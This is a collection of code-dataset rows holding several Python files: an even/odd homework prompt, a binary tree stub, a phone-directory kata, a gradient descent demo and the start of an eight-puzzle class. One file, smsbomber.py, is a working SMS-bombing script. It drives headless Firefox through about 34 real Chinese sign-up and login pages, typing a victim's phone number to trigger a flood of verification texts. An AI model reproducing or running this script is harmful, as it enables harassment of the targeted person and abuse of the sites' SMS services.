| Column | Dtype | Stats |
|---|---|---|
| blob_id | string | lengths 40–40 |
| directory_id | string | lengths 40–40 |
| path | string | lengths 2–616 |
| content_id | string | lengths 40–40 |
| detected_licenses | list | lengths 0–69 |
| license_type | string | 2 classes |
| repo_name | string | lengths 5–118 |
| snapshot_id | string | lengths 40–40 |
| revision_id | string | lengths 40–40 |
| branch_name | string | lengths 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k–686M (nullable) |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 classes |
| content | string | lengths 2–10.3M |
| authors | list | lengths 1–1 |
| author_id | string | lengths 0–212 |
c946ebf65e15dab1f0d9b98fff4d00ee381324a6
|
2dfc7642e778390b89a40413dbb64f2930b50ceb
|
/class5-functions_and_loops/problem.py
|
496ee84f08f5e1947c5bf45dcafd79373b57a2b6
|
[] |
no_license
|
tsui-david/tzu-chi-cs-class
|
dc740d50fcbdec91ab2be57fa41ebf4bdbc211c2
|
b75b567719ad03d46a42bdc671cad26f6f28e777
|
refs/heads/main
| 2023-03-20T11:37:24.989996
| 2021-03-07T16:20:05
| 2021-03-07T16:20:05
| 307,110,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
"""
Last week we created a program that accepts a number as user input
and checks:
(1) If the number is odd, print out "odd"
(2) If the number is even, print out "even"
"""
input_num = int(input('Input a number: '))
if input_num % 2 == 0:
print("even")
else:
print("odd")
"""
This week I want you to keep asking the user for numbers and print out even/odd until the user types in "stop"
Todo this I would like the following requirements:
- [ ] Until the user types in "stop" do not exit the code (hint: what allows us to do things over and over again?)
- [ ] Organize the even/odd logic into a function called "getEvenOdd"
- [ ] getEvenOdd will return the string "even" if the argument is even and "odd" if the argument is "odd"
- [ ] use getEvenOdd in your program
"""
|
[
"david.r.tsui@gmail.com"
] |
david.r.tsui@gmail.com
|
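A minimal sketch of the assignment described in the docstring above, assuming "stop" is matched exactly (the prompt leaves casing open):

def getEvenOdd(num):
    # return "even" for even arguments and "odd" for odd ones
    return "even" if num % 2 == 0 else "odd"

while True:
    user_input = input('Input a number (or "stop" to quit): ')
    if user_input == "stop":
        break
    print(getEvenOdd(int(user_input)))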
f067595b20bc57e3ed96ec100e0903721aaeea6c
|
1e2f1acfee7b707a6cc7cfe0ef48655b2a89fd11
|
/smsbomber.py
|
eef5d18d6c83cb56dad509c85d5c02dd9d39be14
|
[] |
no_license
|
bumzy/smsbomber
|
4431a07188c78bec7c296dadf37910cbe7e57ae8
|
d0c52d7d72b63caf580a505fed359da85dcdc8e4
|
refs/heads/master
| 2021-06-11T07:11:44.841964
| 2019-06-23T05:00:34
| 2019-06-23T05:00:34
| 193,308,016
| 0
| 0
| null | 2021-06-01T23:50:51
| 2019-06-23T04:57:24
|
Python
|
UTF-8
|
Python
| false
| false
| 17,432
|
py
|
# encoding=utf8
import time
from selenium import webdriver
class Bomber(object):
def __init__(self, phone):
self.phone = phone
self.options = webdriver.FirefoxOptions()
self.options.add_argument('--headless')  # headless mode
# Baidu
def func0(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.baidu.com/')
browser.find_element_by_xpath('//*[@id="u1"]/a[7]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__footerULoginBtn"]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsSwitchWrapper"]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsPhone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsTimer"]').click()
browser.quit()
# Yihaodian (yhd.com)
def func1(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.yhd.com/passport/register_input.do')
browser.find_element_by_xpath('//*[@id="userName"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click()
browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click()
browser.quit()
# China Mobile
def func2(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://login.10086.cn/login.html')
browser.find_element_by_xpath('//*[@id="sms_login_1"]').click()
browser.find_element_by_xpath('//*[@id="sms_name"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="getSMSPwd1"]').click()
browser.quit()
# 51book
def func3(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://caigou.51book.com/caigou/manage/designatedRegistryNewSignon.in')
browser.find_element_by_xpath('//*[@id="cg_06"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendMSgBtu"]').click()
browser.quit()
# Shijiebang
def func4(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.shijiebang.com/reg/')
browser.find_element_by_xpath('/html/body/div[1]/div/div[3]/div/ul[1]/li[1]/a').click()
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/div/label[2]/input').click()
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[1]/td/div/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[2]/td/div/button').click()
browser.quit()
# Youku
def func5(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://account.youku.com/register.htm')
browser.find_element_by_xpath('//*[@id="passport"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="password"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="repeatPsd"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="getMobileCode"]').click()
browser.quit()
# Amazon China
def func6(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.amazon.cn/ap/register?_encoding=UTF8&openid.assoc_handle=cnflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.cn%2Fgp%2Fyourstore%2Fhome%3Fie%3DUTF8%26ref_%3Dnav_custrec_newcust')
# browser.find_element_by_xpath('//*[@id="nav-flyout-ya-newCust"]/a').click()
browser.find_element_by_xpath('//*[@id="ap_customer_name"]').send_keys('Mike998')
browser.find_element_by_xpath('//*[@id="ap_phone_number"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="ap_password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="ap_register_form"]/div/div/div[5]/div/label/input').click()
browser.find_element_by_xpath('//*[@id="continue"]').click()
browser.quit()
# SegmentFault
def func7(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://segmentfault.com/')
browser.find_element_by_xpath('/html/body/div[2]/nav/div[2]/div[2]/ul/li/a[1]').click()
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[4]/a').click()
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[2]/div[1]/span/button').click()
browser.quit()
# Zhongrui Wealth (zrcaifu.com)
def func8(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.zrcaifu.com/register')
browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').click()
browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').click()
browser.find_element_by_xpath('//*[@id="register-ul"]/li[3]/input').send_keys('pwd123456')
time.sleep(1)
browser.find_element_by_xpath('//*[@id="sendsms-for-regiter"]').click()
browser.quit()
# 97gg.net
def func9(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.97gg.net/Account/Register')
browser.find_element_by_xpath('//*[@id="phoneRegistTab"]/tab').click()
browser.find_element_by_xpath('//*[@id="UserName"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="Password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="ConfirmPassword"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="chkCodeSendBtn"]').click()
browser.quit()
# Qianmi (1000.com)
def func10(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.1000.com/reg?us=3W-head')
browser.find_element_by_xpath('//*[@id="react-content"]/div/div/div/div[2]/form/div[2]/div[2]/div/div/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="send_code"]').click()
browser.quit()
# Vipshop
def func11(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.vip.com/register')
browser.find_element_by_xpath('//*[@id="J_mobile_name"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="J_mobile_verifycode_btn"]').click()
browser.quit()
# Haichufang
def func12(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://m.haichufang.com/reg.html')
browser.find_element_by_xpath('//*[@id="login"]/div[2]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="login"]/div[2]/div[2]/div[1]').click()
browser.quit()
# Haomeijia (jaja123.com)
def func13(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.jaja123.com/web/register')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[2]/div[1]/input').send_keys(u'张飞')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[3]/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[4]/div[1]/input').send_keys('pwd123456')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[5]/div[1]/input').send_keys('pwd123456')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[6]/div[1]/div/span/button').click()
browser.quit()
# Xiaomi
def func14(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://cn.account.xiaomi.com/pass/register?_locale=zh_CN')
browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[3]/div[2]/label/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[6]/input').click()
browser.quit()
# Giant Network (ztgame.com)
def func15(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://reg.ztgame.com/')
browser.find_element_by_xpath('//*[@id="reg_form"]/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="reg_form"]/div[2]/input[2]').click()
browser.quit()
# Weimob
def func16(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://account.weimob.com/register')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="signUpForm"]/div[3]/a').click()
browser.quit()
# Homekoo (homekoo.com)
def func17(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.homekoo.com/zhixiao/cuxiao/index.php')
browser.find_element_by_xpath('//*[@id="username5"]').send_keys(u'张飞')
browser.find_element_by_xpath('//*[@id="tel5"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="submit_img5"]').click()
browser.quit()
# Happigo
def func18(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.happigo.com/register/')
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="send_auth_code"]').click()
browser.quit()
# CNMO (Phone China)
def func19(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://passport.cnmo.com/register/')
browser.find_element_by_xpath('//*[@id="m_mobile"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="m_uname"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="m_password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="m_confirm"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="m_getcode"]').click()
browser.quit()
# Suning
def func20(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://reg.suning.com/person.do')
browser.find_element_by_xpath('//*[@id="mobileAlias"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendSmsCode"]').click()
browser.quit()
# iQIYI
def func21(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.iqiyi.com/iframe/loginreg?is_reg=1&')
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[2]/i').click()
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[1]/div[2]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/a[2]').click()
browser.quit()
def func22(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.facebank.cn/user.html')
# browser.switch_to.alert()
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="getSmsCode"]').click()
time.sleep(1)
browser.quit()
# Alipay
def func23(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://memberprod.alipay.com/account/reg/index.htm')
# focus issue unresolved, so the Alipay endpoint does not work
browser.quit()
# Fenbi
def func24(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://fenbi.com/web/signup')
# popup issue, this endpoint does not work
browser.quit()
def func25(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://jrh.financeun.com/Login/jrwLogin?web=jrw')
browser.find_element_by_xpath('//*[@id="login-segment-phoneLogin"]').click()
browser.find_element_by_xpath('//*[@id="quickMobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="quickSendMsgCode"]').click()
browser.quit()
def func26(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.maifupay.com/register')
browser.find_element_by_xpath('/html/body/div[2]/div/div[1]/form/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendVerifySmsButton"]').click()
browser.quit()
def func27(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.ingping.com/reg/index?retUrl=https%3A%2F%2Fwww.ingping.com&fxPid=')
browser.find_element_by_xpath('//*[@id="phoneNum"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendRegMsgA"]').click()
browser.quit()
def func28(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.decathlon.com.cn/zh/create')
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="login-button"]').click()
time.sleep(1)
browser.quit()
# Xunlei
def func29(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://vip.xunlei.com/?referfrom=v_pc_qtcp_ggong_xlhy')
# like the Alipay page, the focus issue cannot be resolved here; presumably it needs JS
browser.quit()
def func30(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://my.ruanmei.com/?page=register')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="sendsms"]').click()
browser.quit()
def func31(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.juhe.cn/register')
browser.find_element_by_xpath('//*[@id="username"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="mobilephone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="reg_smsbtn"]').click()
time.sleep(1)
browser.quit()
def func32(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://passport.zongheng.com/webreg?location=http%3A%2F%2Fwww.zongheng.com%2F')
browser.find_element_by_xpath('//*[@id="regphone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('/html/body/div[3]/div[2]/p[3]/span').click()
browser.quit()
def func33(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://wap.51kid.com/a/free-lesson')
browser.find_element_by_xpath('//*[@id="wechat"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="apply"]/div[3]/div').click()
browser.quit()
|
[
"bumzycm@gmail.com"
] |
bumzycm@gmail.com
|
3d613b080afe7af474f8504d12bf40d8034710ab
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/binaryTree2_20200615152326.py
|
64f23d35b04053fcbead026e6e8a6c7c2d94f816
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 396
|
py
|
# Create a node and assign a value to the node
class Node:
def __init__(self,data):
# designate one node as root
self.data = data
# then the two others as child nodes
self.left = None
self.right = None
def printTree(self):
print(self.data)
root = Node(10)
root.left = Node(2)
root.right = Node(3)
root.printTree()
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
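printTree above only prints the root's value; below is a hedged sketch of the in-order traversal this tutorial snapshot appears to be building toward (the traversal itself is an assumption, it is not in the file):

def print_in_order(node):
    # left subtree, then the node itself, then the right subtree
    if node is None:
        return
    print_in_order(node.left)
    print(node.data)
    print_in_order(node.right)

print_in_order(root)  # prints 2, 10, 3 for the tree built above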
e4d683794d458ed13eab1f94478c4c152a35abfa
|
c885656dc11b4a0becd6bee5ada7ebb7927d090f
|
/Fundamentals/phone_directory.py
|
5eac7c1f4309d7c64a31b0353cf36690f4ef2652
|
[] |
no_license
|
nlpet/codewars
|
804da896cd608ae842442098383a8685a809158c
|
b53a2006a499350d846524f45966dafef035cd71
|
refs/heads/master
| 2021-06-24T08:55:31.663474
| 2017-07-19T11:09:12
| 2017-07-19T11:09:12
| 83,186,729
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,565
|
py
|
r"""
Phone directory problem on codewars.
John keeps a backup of his old personal phone book as a text file. On each line
of the file he can find the phone number (formatted as +X-abc-def-ghij where X stands
for one or two digits), the corresponding name between < and > and the address.
Unfortunately everything is mixed, things are not always in the same order,
lines are cluttered with non-alpha-numeric characters.
Examples of John's phone book lines:
"/+1-541-754-3010 156 Alphand_St. <J Steeve>\n"
" 133, Green, Rd. <E Kustur> NY-56423 ;+1-541-914-3010!\n"
"<Anastasia> +48-421-674-8974 Via Quirinal Roma\n"
Could you help John with a program that, given the lines of his phone book and a phone
number, returns a string for this number: "Phone => num, Name => name, Address => address"
Examples:
s = "/+1-541-754-3010 156 Alphand_St. <J Steeve>\n 133, Green,
Rd. <E Kustur> NY-56423 ;+1-541-914-3010!\n"
phone(s, "1-541-754-3010") should return "Phone => 1-541-754-3010,
Name => J Steeve, Address => 156 Alphand St."
It can happen that, for a few phone numbers, there are many people
for a phone number, say nb; in that case
return: "Error => Too many people: nb"
or it can happen that the number nb is not in the phone book, in that case
return: "Error => Not found: nb"
"""
import re
import sys
sys.path.append('..')
from helpers.test_wrapper import Test
def phone(strng, num):
match_phone = re.findall(num, strng)
found = 0
result = 'Error => Not found: {}'.format(num)
if len(match_phone) == 0:
return result
for line in strng.split('\n'):
match_phone = re.search(num, line)
if match_phone:
name = re.sub(r".*<(.*)>.*", r"\g<1>", line)
if re.sub(r".*<(.*)>.*", r"\g<1>", result):
found += 1
clean_line = line.replace(num, '').replace(name, '')
addr = " ".join(re.sub(r"[^a-zA-Z0-9.-]", " ", clean_line).split())
result = 'Phone => {}, Name => {}, Address => {}'.format(num, name, addr)
if found > 1:
result = 'Error => Too many people: {}'.format(num)
return result
def run_tests():
with Test() as test:
dr = (
"/+1-541-754-3010 156 Alphand_St. <J Steeve>\n 133, Green, Rd. <E Kustur> NY-56423 ;+1-541-914-3010;\n"
"+1-541-984-3012 <P Reed> /PO Box 530; Pollocksville, NC-28573\n :+1-321-512-2222 <Paul Dive> Sequoia Alley PQ-67209\n"
"+1-741-984-3090 <Peter Reedgrave> _Chicago\n :+1-921-333-2222 <Anna Stevens> Haramburu_Street AA-67209\n"
"+1-111-544-8973 <Peter Pan> LA\n +1-921-512-2222 <Wilfrid Stevens> Wild Street AA-67209\n"
"<Peter Gone> LA ?+1-121-544-8974 \n <R Steell> Quora Street AB-47209 +1-481-512-2222!\n"
"<Arthur Clarke> San Antonio $+1-121-504-8974 TT-45120\n <Ray Chandler> Teliman Pk. !+1-681-512-2222! AB-47209,\n"
"<Sophia Loren> +1-421-674-8974 Bern TP-46017\n <Peter O'Brien> High Street +1-908-512-2222; CC-47209\n"
"<Anastasia> +48-421-674-8974 Via Quirinal Roma\n <P Salinger> Main Street, +1-098-512-2222, Denver\n"
"<C Powel> *+19-421-674-8974 Chateau des Fosses Strasbourg F-68000\n <Bernard Deltheil> +1-498-512-2222; Mount Av. Eldorado\n"
"+1-099-500-8000 <Peter Crush> Labrador Bd.\n +1-931-512-4855 <William Saurin> Bison Street CQ-23071\n"
"<P Salinge> Main Street, +1-098-512-2222, Denve\n"
)
def testing(actual, expected):
test.assert_equals(actual, expected)
test.describe("phone")
test.it("Basic tests")
testing(phone(dr, "48-421-674-8974"), "Phone => 48-421-674-8974, Name => Anastasia, Address => Via Quirinal Roma")
testing(phone(dr, "1-921-512-2222"), "Phone => 1-921-512-2222, Name => Wilfrid Stevens, Address => Wild Street AA-67209")
testing(phone(dr, "1-908-512-2222"), "Phone => 1-908-512-2222, Name => Peter O'Brien, Address => High Street CC-47209")
testing(phone(dr, "1-541-754-3010"), "Phone => 1-541-754-3010, Name => J Steeve, Address => 156 Alphand St.")
testing(phone(dr, "1-121-504-8974"), "Phone => 1-121-504-8974, Name => Arthur Clarke, Address => San Antonio TT-45120")
testing(phone(dr, "1-498-512-2222"), "Phone => 1-498-512-2222, Name => Bernard Deltheil, Address => Mount Av. Eldorado")
testing(phone(dr, "1-098-512-2222"), "Error => Too many people: 1-098-512-2222")
testing(phone(dr, "5-555-555-5555"), "Error => Not found: 5-555-555-5555")
if __name__ == '__main__':
run_tests()
|
[
"schottkey@gmail.com"
] |
schottkey@gmail.com
|
8f5adc4fc685a863c2fb0e954b71e6b597fbc626
|
0ff5a88f42d5e6179583a3251b892b93cf1f6d0d
|
/L1/1_3/1_3_stochastic_gradient_descent.py
|
0eb1234bf20283ced231ac91396577bf9e55c02c
|
[] |
no_license
|
kaz-nakazawa/DL_E_report
|
a6027f6197b061b63fd7cda022ec12dd10b87cf3
|
c3f8ed72d04a2c35c5da075ba5747c8f9c1bea84
|
refs/heads/master
| 2020-06-12T23:49:39.019418
| 2019-07-15T08:29:14
| 2019-07-15T08:29:14
| 194,465,072
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,701
|
py
|
# coding: utf-8
# stochastic gradient descent
import sys, os
sys.path.append(os.pardir)  # allow importing files from the parent directory
import numpy as np
from common import functions
import matplotlib.pyplot as plt
def print_vec(text, vec):
print("*** " + text + " ***")
print(vec)
#print("shape: " + str(x.shape))
print("")
# sample target function
# the network will learn to predict y
def f(x):
y = 3 * x[0] + 2 * x[1]
return y
# initial setup
def init_network():
# print("##### ネットワークの初期化 #####")
network = {}
nodesNum = 10
network['W1'] = np.random.randn(2, nodesNum)
network['W2'] = np.random.randn(nodesNum)
network['b1'] = np.random.randn(nodesNum)
network['b2'] = np.random.randn()
# print_vec("重み1", network['W1'])
# print_vec("重み2", network['W2'])
# print_vec("バイアス1", network['b1'])
# print_vec("バイアス2", network['b2'])
return network
# forward propagation
def forward(network, x):
# print("##### 順伝播開始 #####")
W1, W2 = network['W1'], network['W2']
b1, b2 = network['b1'], network['b2']
u1 = np.dot(x, W1) + b1
z1 = functions.relu(u1)
## try this
#z1 = functions.sigmoid(u1)
u2 = np.dot(z1, W2) + b2
y = u2
# print_vec("総入力1", u1)
# print_vec("中間層出力1", z1)
# print_vec("総入力2", u2)
# print_vec("出力1", y)
# print("出力合計: " + str(np.sum(y)))
return z1, y
# backpropagation
def backward(x, d, z1, y):
# print("\n##### 誤差逆伝播開始 #####")
grad = {}
W1, W2 = network['W1'], network['W2']
b1, b2 = network['b1'], network['b2']
# delta at the output layer
delta2 = functions.d_mean_squared_error(d, y)
# gradient of b2
grad['b2'] = np.sum(delta2, axis=0)
# gradient of W2
grad['W2'] = np.dot(z1.T, delta2)
# delta at the hidden layer
delta1 = np.dot(delta2, W2.T) * functions.d_relu(z1)
## try this
# delta1 = np.dot(delta2, W2.T) * functions.d_sigmoid(z1)
delta1 = delta1[np.newaxis, :]
# gradient of b1
grad['b1'] = np.sum(delta1, axis=0)
x = x[np.newaxis, :]
# gradient of W1
grad['W1'] = np.dot(x.T, delta1)
# print_vec("偏微分_重み1", grad["W1"])
# print_vec("偏微分_重み2", grad["W2"])
# print_vec("偏微分_バイアス1", grad["b1"])
# print_vec("偏微分_バイアス2", grad["b2"])
return grad
# create sample data
data_sets_size = 100000
data_sets = [0 for i in range(data_sets_size)]
for i in range(data_sets_size):
data_sets[i] = {}
# set random values
data_sets[i]['x'] = np.random.rand(2)
## try this: alternative input values
# data_sets[i]['x'] = np.random.rand(2) * 10 - 5  # random values in -5 to 5
# set the target output
data_sets[i]['d'] = f(data_sets[i]['x'])
losses = []
# learning rate
learning_rate = 0.07
# number of samples to draw
epoch = 1000
# initialize the parameters
network = init_network()
# randomly sample the data
random_datasets = np.random.choice(data_sets, epoch)
# gradient descent loop
for dataset in random_datasets:
x, d = dataset['x'], dataset['d']
z1, y = forward(network, x)
grad = backward(x, d, z1, y)
# apply the gradients to the parameters
for key in ('W1', 'W2', 'b1', 'b2'):
network[key] -= learning_rate * grad[key]
# loss
loss = functions.mean_squared_error(d, y)
losses.append(loss)
print("##### 結果表示 #####")
lists = range(epoch)
plt.plot(lists, losses, '.')
plt.title('loss')
# show the plot
plt.show()
|
[
"noreply@github.com"
] |
kaz-nakazawa.noreply@github.com
|
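The script above depends on the course's common.functions module; here is a self-contained sketch of the same stochastic-gradient-descent idea on the identical linear target f(x) = 3*x0 + 2*x1, using plain NumPy (the seed and the bare linear model are assumptions for illustration):

import numpy as np

rng = np.random.default_rng(0)
w = rng.standard_normal(2)    # weights to learn; the target is [3, 2]
b = 0.0                       # bias to learn; the target is 0
lr = 0.07                     # same learning rate as the script above
for _ in range(1000):
    x = rng.random(2)
    d = 3 * x[0] + 2 * x[1]   # target from the same f(x)
    y = w @ x + b             # linear model prediction
    g = y - d                 # gradient of 0.5 * (y - d) ** 2 w.r.t. y
    w -= lr * g * x           # one stochastic gradient step per sample
    b -= lr * g
print(w, b)                   # w approaches [3, 2] and b approaches 0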
adc3b4f80abdaf533b97d9b62f5538e55b5a821b
|
9b90373955433cdfa8806373ff343a471a1adcc1
|
/src/algorithms/07-eight-puzzle-game/puzzle.py
|
588dfe7e1d947e7edea11228791b0e78357e64c7
|
[
"MIT"
] |
permissive
|
SamVanhoutte/python-musings
|
0a69f44dc8321792df2a6f57c5821ed52784dcf6
|
18e9b6b366af6c072a5d928f95f30ea88f01f540
|
refs/heads/master
| 2021-07-25T18:39:59.328235
| 2020-05-18T06:41:08
| 2020-05-18T06:41:08
| 171,827,369
| 0
| 0
|
MIT
| 2019-12-24T09:05:16
| 2019-02-21T08:03:45
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,387
|
py
|
from random import shuffle, choice
import numpy as np
import math
class Puzzle:
board = [[]]
depth = 0
_goal = [[1, 2, 3],[4, 0, 5], [6, 7, 8]]
def __init__(self, signature:str = None):
if(signature!=None):
self.board = np.zeros((3, 3), int)
seq = 0
for row in range(0, 3):
for col in range(0, 3):
self.board[row][col] = 0 if signature[seq]==' ' else signature[seq]
seq += 1
else:
#print('Making 200 random moves from the goal state back')
# start from the goal and make 200 random moves back from it
self.board = np.copy(self._goal)
for _ in range(200) :
move = choice(self.get_available_moves())
self.move_cell(move[0], move[1])
def set_state(self, board):
self.board = board
